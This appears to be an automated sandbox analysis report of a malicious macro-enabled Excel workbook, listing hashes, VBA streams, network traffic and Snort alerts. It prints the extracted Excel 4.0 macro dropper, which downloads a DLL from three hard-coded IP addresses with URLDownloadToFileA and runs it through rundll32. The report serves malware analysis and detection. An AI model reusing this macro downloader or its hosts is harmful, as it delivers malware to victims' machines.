        Malicious:false
        Reputation:low
        Preview: .U.n.0....?...".....r.y...I>.&..m.$H...K...$$@.zQ;.3\p..V.K.AYS..:"..a.2uE...._.....5P.5.r=..m..v...6."M..7cA4..@...+3.[.....q..5.....k".X.A&.[.......~.t2U..7...UE.sZ...Q.4..... .xi........VS..2.G.....rz.a..V....Xh..?P....rZ.....T..;..._.A.$....?.E..J.W..Sk..<or..%..h.-.-....>.k\.7Qg.re`.v........$.........5d..............4?{.:.&...,_?>?......B.-CFu....p..1.T.z..cw.!=.M-....}.....3..7...r.......;ap.7.B.e.N[...v......z..T]:........c.`.Nx....W.<..r.O........PK..........!.........*.......[Content_Types].xml ...(.................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
        C:\Users\user\Desktop\~$9177284661-04302021.xlsm
        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
        File Type:data
        Category:dropped
        Size (bytes):330
        Entropy (8bit):1.4377382811115937
        Encrypted:false
        SSDEEP:3:vZ/FFDJw2fj/FFDJw2fV:vBFFGaFFGS
        MD5:96114D75E30EBD26B572C1FC83D1D02E
        SHA1:A44EEBDA5EB09862AC46346227F06F8CFAF19407
        SHA-256:0C6F8CF0E504C17073E4C614C8A7063F194E335D840611EEFA9E29C7CED1A523
        SHA-512:52D33C36DF2A91E63A9B1949FDC5D69E6A3610CD3855A2E3FC25017BF0A12717FC15EB8AC6113DC7D69C06AD4A83FAF0F021AD7C8D30600AA8168348BD0FA9E0
        Malicious:true
        Reputation:high, very likely benign file
        Preview: .user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ..user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

        Static File Info

        General

        File type:Microsoft Excel 2007+
        Entropy (8bit):7.679226664040162
        TrID:
        • Excel Microsoft Office Open XML Format document with Macro (57504/1) 54.50%
        • Excel Microsoft Office Open XML Format document (40004/1) 37.92%
        • ZIP compressed archive (8000/1) 7.58%
        File name:9177284661-04302021.xlsm
        File size:114788
        MD5:a8b4e37766d35b543884d8882147eaa2
        SHA1:4356c14118ea9098dabb6d9af620003b7929058a
        SHA256:533c8713c4e10c223a9f8139f9d408ca326aee14a1d88382c91f2ff18cf0f93c
        SHA512:581ee69b843a7657677e1f6b74147f273f340474ff36de56b1d579d0364ccc6c27c2f9dedf4d855bc2841351957a3620dc0327153ff4ff3dc87a2c6ad7eb8a6f
        SSDEEP:3072:K6vKINbjvw548LMb/oqKO8NnS8+60Kcxtc:6AbT648LM7D98Np+Et
        File Content Preview:PK..........!."..R....*.......[Content_Types].xml ...(.........................................................................................................................................................................................................

        File Icon

        Icon Hash:e4e2aa8aa4bcbcac

        Static OLE Info

        General

        Document Type:OpenXML
        Number of OLE Files:1

        OLE File "/opt/package/joesandbox/database/analysis/403443/sample/9177284661-04302021.xlsm"

        Indicators

        Has Summary Info:False
        Application Name:unknown
        Encrypted Document:False
        Contains Word Document Stream:
        Contains Workbook/Book Stream:
        Contains PowerPoint Document Stream:
        Contains Visio Document Stream:
        Contains ObjectPool Stream:
        Flash Objects Count:
        Contains VBA Macros:True

        Summary

        Author:Rabota
        Last Saved By:Noped
        Create Time:2015-06-05T18:19:34Z
        Last Saved Time:2021-04-30T08:26:34Z
        Creating Application:Microsoft Excel
        Security:0

        Document Summary

        Thumbnail Scaling Desired:false
        Company:
        Contains Dirty Links:false
        Shared Document:false
        Changed Hyperlinks:false
        Application Version:16.0300

        Streams with VBA

        VBA File Name: Byutut.bas, Stream Size: 1343
        General
        Stream Path:VBA/Byutut
        VBA File Name:Byutut.bas
        Stream Size:1343
        Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ; G . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
        Data Raw:01 16 03 00 03 f0 00 00 00 e2 02 00 00 d4 00 00 00 b0 01 00 00 ff ff ff ff 10 03 00 00 b0 04 00 00 00 00 00 00 01 00 00 00 1c cc 3b 47 00 00 ff ff 03 00 00 00 00 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff 08 00 ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

        VBA Code Keywords

        Keyword
        Function
        Application.Run
        Attribute
        Auto_Open()
        VB_Name
        "Byutut"
        Public
        VBA Code
        VBA File Name: Class1.cls, Stream Size: 999
        General
        Stream Path:VBA/Class1
        VBA File Name:Class1.cls
        Stream Size:999
        Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . - . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
        Data Raw:01 16 03 00 00 f0 00 00 00 d2 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff d9 02 00 00 2d 03 00 00 00 00 00 00 01 00 00 00 1c cc a3 ac 00 00 ff ff 01 00 00 00 80 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

        VBA Code Keywords

        Keyword
        False
        VB_Exposed
        Attribute
        VB_Name
        VB_Creatable
        VB_PredeclaredId
        VB_GlobalNameSpace
        VB_Base
        VB_Customizable
        VB_TemplateDerived
        VBA Code

        Streams

        Stream Path: PROJECT, File Type: ISO-8859 text, with CRLF line terminators, Stream Size: 543
        General
        Stream Path:PROJECT
        File Type:ISO-8859 text, with CRLF line terminators
        Stream Size:543
        Entropy:5.37319650849
        Base64 Encoded:True
        Data ASCII:I D = " { 6 5 E C 9 F D C - 2 0 9 0 - 4 6 C 0 - 8 5 8 F - 4 1 2 6 6 D 3 E 0 1 6 B } " . . D o c u m e n t = . . . . . . . . / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = . . . . 1 / & H 0 0 0 0 0 0 0 0 . . M o d u l e = B y u t u t . . D o c u m e n t = . . . . 2 / & H 0 0 0 0 0 0 0 0 . . C l a s s = C l a s s 1 . . N a m e = " V B A P r o j e c t " . . H e l p C o n t e x t I D = " 0 " . . V e r s i o n C o m p a t i b l e 3 2 = " 3 9 3 2 2 2 0 0 0 " . . C M G = " 0 9 0 B D 9 D F D D D F D D D F D D D F D D
        Data Raw:49 44 3d 22 7b 36 35 45 43 39 46 44 43 2d 32 30 39 30 2d 34 36 43 30 2d 38 35 38 46 2d 34 31 32 36 36 44 33 45 30 31 36 42 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d dd f2 e0 ca ed e8 e3 e0 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 44 6f 63 75 6d 65 6e 74 3d cb e8 f1 f2 31 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 4d 6f 64 75 6c 65 3d 42 79 75 74 75 74 0d 0a 44 6f 63 75 6d 65 6e 74 3d cb e8
        Stream Path: PROJECTwm, File Type: data, Stream Size: 107
        General
        Stream Path:PROJECTwm
        File Type:data
        Stream Size:107
        Entropy:3.96151942936
        Base64 Encoded:False
        Data ASCII:. . . . . . . . . - . B . 0 . . . = . 8 . 3 . 0 . . . . . . . 1 . . . 8 . A . B . 1 . . . B y u t u t . B . y . u . t . u . t . . . . . . . 2 . . . 8 . A . B . 2 . . . C l a s s 1 . C . l . a . s . s . 1 . . . . .
        Data Raw:dd f2 e0 ca ed e8 e3 e0 00 2d 04 42 04 30 04 1a 04 3d 04 38 04 33 04 30 04 00 00 cb e8 f1 f2 31 00 1b 04 38 04 41 04 42 04 31 00 00 00 42 79 75 74 75 74 00 42 00 79 00 75 00 74 00 75 00 74 00 00 00 cb e8 f1 f2 32 00 1b 04 38 04 41 04 42 04 32 00 00 00 43 6c 61 73 73 31 00 43 00 6c 00 61 00 73 00 73 00 31 00 00 00 00 00
        Stream Path: VBA/_VBA_PROJECT, File Type: data, Stream Size: 2831
        General
        Stream Path:VBA/_VBA_PROJECT
        File Type:data
        Stream Size:2831
        Entropy:4.1308794712
        Base64 Encoded:False
        Data ASCII:. a . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 2 . # . 9 . # . C . : . \\ . P . r . o . g . r . a . m . . F . i . l . e . s . \\ . C . o . m . m . o . n . . F . i . l . e . s . \\ . M . i . c . r . o . s . o . f . t . . S . h . a . r . e . d . \\ . V . B . A . \\ . V . B . A . 7 . . . 1 . \\ . V . B . E . 7 .
        Data Raw:cc 61 b2 00 00 03 00 ff 19 04 00 00 09 04 00 00 e3 04 03 00 00 00 00 00 00 00 00 00 01 00 04 00 02 00 20 01 2a 00 5c 00 47 00 7b 00 30 00 30 00 30 00 32 00 30 00 34 00 45 00 46 00 2d 00 30 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 2d 00 43 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 34 00 36 00 7d 00 23 00 34 00 2e 00 32 00 23 00
        Stream Path: VBA/__SRP_0, File Type: data, Stream Size: 1642
        General
        Stream Path:VBA/__SRP_0
        File Type:data
        Stream Size:1642
        Entropy:3.30953727146
        Base64 Encoded:False
        Data ASCII:. K * . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . r U . . . . . . . . @ . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ ` . . . . . . . . . . . . . . . " . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . Q . . . . . . . . . . . . b . T Z . . F . v . V . e . . . . . . . . . . . . . . . . . . . . . . . . . .
        Data Raw:93 4b 2a b2 03 00 10 00 00 00 ff ff 00 00 00 00 01 00 02 00 ff ff 00 00 00 00 01 00 00 00 02 00 00 00 00 00 01 00 02 00 02 00 00 00 00 00 01 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 00 00 72 55 c0 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 06 00 00 00 00 00 00 7e 02 00 00 00 00 00 00 7e 02 00 00 00
        Stream Path: VBA/__SRP_1, File Type: data, Stream Size: 146
        General
        Stream Path:VBA/__SRP_1
        File Type:data
        Stream Size:146
        Entropy:1.48909835582
        Base64 Encoded:False
        Data ASCII:r U @ . . . . . . . . . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . j . . . . . . . . . . . . . . .
        Data Raw:72 55 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 12 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 00 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 11 00 00 00 00 00 00 00 00 00 03 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff
        Stream Path: VBA/__SRP_2, File Type: data, Stream Size: 170
        General
        Stream Path:VBA/__SRP_2
        File Type:data
        Stream Size:170
        Entropy:1.65437585425
        Base64 Encoded:False
        Data ASCII:r U @ . . . . . . . @ . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . ~ x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . a . . . . . . . . . . . . . . . . . . . . Z . . . 2 . . . . . . . . . . . . . . .
        Data Raw:72 55 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 04 00 00 00 00 00 00 7e 78 00 00 00 00 00 00 7f 00 00 00 00 00 00 00 00 1a 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 03 00 10 00 00 00 00 00 00 00 00 00 02 00 00 00 00 00 00 00 00 00 ff ff ff ff ff ff ff ff 0c 00 00 00 00 00 00 12 00 00
        Stream Path: VBA/__SRP_3, File Type: data, Stream Size: 156
        General
        Stream Path:VBA/__SRP_3
        File Type:data
        Stream Size:156
        Entropy:1.63365900945
        Base64 Encoded:False
        Data ASCII:r U @ . . . . . . . . . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 8 . . . . . . . . . . . . . . . . ` . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . b . . . . . . . . . . . . . . .
        Data Raw:72 55 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1a 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 02 00 ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00 10 00 00 00 08 00 38 00 f1 00 00 00 00 00 00 00 00 00 02 00 00 00 00 60 00 00 fd ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00
        Stream Path: VBA/dir, File Type: data, Stream Size: 601
        General
        Stream Path:VBA/dir
        File Type:data
        Stream Size:601
        Entropy:6.45605461621
        Base64 Encoded:True
        Data ASCII:. U . . . . . . . . . . 0 * . . . . . p . . H . . . . . d . . . . . . . . V B A P r o j e . c t . . 4 . . @ . . j . . . = . . . . r . . . . . . . . . . O ~ b . . . . . J < . . . . . r . s t d o l e > . . . s . t . d . o . . l . e . . . h . % . ^ . . * \\ G { 0 0 . 0 2 0 4 3 0 - . . . . . C . . . . . . 0 0 4 . 6 } # 2 . 0 # 0 . # C : \\ W i n d . o w s \\ S y s t e m 3 2 \\ . e 2 . . t l b # O L E . A u t o m a t i . o n . ` . . . E O f f D i c . E O . f . . i . . c . E . . . . . . . E . 2 D F 8 D 0 4 C . -
        Data Raw:01 55 b2 80 01 00 04 00 00 00 03 00 30 2a 02 02 90 09 00 70 14 06 48 03 00 82 02 00 64 e3 04 04 00 0a 00 1c 00 56 42 41 50 72 6f 6a 65 88 63 74 05 00 34 00 00 40 02 14 6a 06 02 0a 3d 02 0a 07 02 72 01 14 08 05 06 12 09 02 12 a6 4f 7e 62 05 94 00 0c 02 4a 3c 02 0a 16 00 01 72 80 73 74 64 6f 6c 65 3e 02 19 00 73 00 74 00 64 00 6f 00 80 6c 00 65 00 0d 00 68 00 25 02 5e 00 03 2a 5c 47
        Stream Path: VBA/\x1051\x1080\x1089\x10901, File Type: data, Stream Size: 990
        General
        Stream Path:VBA/\x1051\x1080\x1089\x10901
        File Type:data
        Stream Size:990
        Entropy:3.19675892958
        Base64 Encoded:True
        Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . - . . . . . . . . . . . . . . . . . . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
        Data Raw:01 16 03 00 00 f0 00 00 00 d2 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff d9 02 00 00 2d 03 00 00 00 00 00 00 01 00 00 00 1c cc 1e a1 00 00 ff ff 23 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
        Stream Path: VBA/\x1051\x1080\x1089\x10902, File Type: data, Stream Size: 990
        General
        Stream Path:VBA/\x1051\x1080\x1089\x10902
        File Type:data
        Stream Size:990
        Entropy:3.19281939975
        Base64 Encoded:True
        Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . - . . . . . . . . . . . . . . . . . . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
        Data Raw:01 16 03 00 00 f0 00 00 00 d2 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff d9 02 00 00 2d 03 00 00 00 00 00 00 01 00 00 00 1c cc b2 ae 00 00 ff ff 23 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
        Stream Path: VBA/\x1069\x1090\x1072\x1050\x1085\x1080\x1075\x1072, File Type: data, Stream Size: 994
        General
        Stream Path:VBA/\x1069\x1090\x1072\x1050\x1085\x1080\x1075\x1072
        File Type:data
        Stream Size:994
        Entropy:3.21355105334
        Base64 Encoded:True
        Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . - . . . . . . . . . . . . . R . . . . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
        Data Raw:01 16 03 00 00 f0 00 00 00 d2 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff d9 02 00 00 2d 03 00 00 00 00 00 00 01 00 00 00 1c cc 52 09 00 00 ff ff 23 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

        Macro 4.0 Code

        ,,,1,,,,,,9,,,"=ON.TIME(NOW()+""00:00:02"",""Milolos"")",,,,,,,,=NOW(),,,,,,"=FORMULA(AH84&AH85&AH86,AJ76)",,,,=HALT(),"=CONCATENATE(AH79,AI71,AH77,AH78)",,,,,,"=CONCATENATE(AH80,AI71,AH77,AH78)",,,,,,"=CONCATENATE(AH81,AI71,AH77,AH78)",,uRlMon,,,,,,,,,,.d,,JJCCBB,,,,at,,Belandes,,,,"=""http://185.45.193.80/""",,,,,,http://82.118.21.70/,=GOTO(Blodas!G6),,,,,http://45.144.31.232/,,..\Niolas.dll,,,,,,,,,,,,,,,,"=""UR""",,,,,,"=""LDownloadT""",,,,,,"=""oFileA""",,,,,
        "=REGISTER(Nyukasl!AJ75,Nyukasl!AJ76,Nyukasl!AJ77,Nyukasl!AJ78,,Nyukasl!AJ68,9)""=Belandes(0,Nyukasl!AH73,Nyukasl!AJ81,0,0)""=IF(G12<0, Belandes(0,Nyukasl!AH74,Nyukasl!AJ81,0,0))""=IF(G13<0, Belandes(0,Nyukasl!AH75,Nyukasl!AJ81,0,0))""=IF(G14<0,CLOSE(0),)"=GOTO(Jioka!H4)
        ,"=""rund""",,"=""ll32 ..\Niolas.dll""","="",DllRegisterServer""",,,,,=PI()=EXEC(I7&I9&I10)=PI(),,,,=HALT(),

        Network Behavior

        Snort IDS Alerts

        TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
        05/04/21-06:08:13.109990TCP1201ATTACK-RESPONSES 403 Forbidden8049167185.45.193.80192.168.2.22
        05/04/21-06:08:55.449467TCP1201ATTACK-RESPONSES 403 Forbidden804917045.144.31.232192.168.2.22

        Network Port Distribution

        TCP Packets

        TimestampSource PortDest PortSource IPDest IP
        May 4, 2021 06:08:12.773962021 CEST4916780192.168.2.22185.45.193.80
        May 4, 2021 06:08:12.827069998 CEST8049167185.45.193.80192.168.2.22
        May 4, 2021 06:08:12.827166080 CEST4916780192.168.2.22185.45.193.80
        May 4, 2021 06:08:12.827898979 CEST4916780192.168.2.22185.45.193.80
        May 4, 2021 06:08:12.880856037 CEST8049167185.45.193.80192.168.2.22
        May 4, 2021 06:08:13.109989882 CEST8049167185.45.193.80192.168.2.22
        May 4, 2021 06:08:13.110054970 CEST4916780192.168.2.22185.45.193.80
        May 4, 2021 06:08:13.164747953 CEST4916880192.168.2.2282.118.21.70
        May 4, 2021 06:08:16.158328056 CEST4916880192.168.2.2282.118.21.70
        May 4, 2021 06:08:22.164798975 CEST4916880192.168.2.2282.118.21.70
        May 4, 2021 06:08:34.163988113 CEST4916980192.168.2.2282.118.21.70
        May 4, 2021 06:08:37.220105886 CEST4916980192.168.2.2282.118.21.70
        May 4, 2021 06:08:43.226696014 CEST4916980192.168.2.2282.118.21.70
        May 4, 2021 06:08:55.272788048 CEST4917080192.168.2.2245.144.31.232
        May 4, 2021 06:08:55.353645086 CEST804917045.144.31.232192.168.2.22
        May 4, 2021 06:08:55.353738070 CEST4917080192.168.2.2245.144.31.232
        May 4, 2021 06:08:55.354362965 CEST4917080192.168.2.2245.144.31.232
        May 4, 2021 06:08:55.438755035 CEST804917045.144.31.232192.168.2.22
        May 4, 2021 06:08:55.449466944 CEST804917045.144.31.232192.168.2.22
        May 4, 2021 06:08:55.449620008 CEST4917080192.168.2.2245.144.31.232
        May 4, 2021 06:09:18.112318993 CEST8049167185.45.193.80192.168.2.22
        May 4, 2021 06:09:18.112449884 CEST4916780192.168.2.22185.45.193.80
        May 4, 2021 06:10:00.456397057 CEST804917045.144.31.232192.168.2.22
        May 4, 2021 06:10:00.456571102 CEST4917080192.168.2.2245.144.31.232
        May 4, 2021 06:10:12.685563087 CEST4917080192.168.2.2245.144.31.232
        May 4, 2021 06:10:12.685642958 CEST4916780192.168.2.22185.45.193.80
        May 4, 2021 06:10:12.740024090 CEST8049167185.45.193.80192.168.2.22
        May 4, 2021 06:10:12.767723083 CEST804917045.144.31.232192.168.2.22

        HTTP Request Dependency Graph

        • 185.45.193.80
        • 45.144.31.232

        HTTP Packets

        Session IDSource IPSource PortDestination IPDestination PortProcess
        0192.168.2.2249167185.45.193.8080C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
        TimestampkBytes transferredDirectionData
        May 4, 2021 06:08:12.827898979 CEST0OUTGET /44313,6048108796.dat HTTP/1.1
        Accept: */*
        UA-CPU: AMD64
        Accept-Encoding: gzip, deflate
        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
        Host: 185.45.193.80
        Connection: Keep-Alive
        May 4, 2021 06:08:13.109989882 CEST1INHTTP/1.1 403 Forbidden
        Server: nginx
        Date: Tue, 04 May 2021 04:08:13 GMT
        Content-Type: text/html
        Content-Length: 548
        Connection: keep-alive
        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a
        Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


        Session IDSource IPSource PortDestination IPDestination PortProcess
        1192.168.2.224917045.144.31.23280C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
        TimestampkBytes transferredDirectionData
        May 4, 2021 06:08:55.354362965 CEST2OUTGET /44313,6048108796.dat HTTP/1.1
        Accept: */*
        UA-CPU: AMD64
        Accept-Encoding: gzip, deflate
        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
        Host: 45.144.31.232
        Connection: Keep-Alive
        May 4, 2021 06:08:55.449466944 CEST3INHTTP/1.1 403 Forbidden
        Server: nginx
        Date: Tue, 04 May 2021 04:08:55 GMT
        Content-Type: text/html
        Content-Length: 548
        Connection: keep-alive
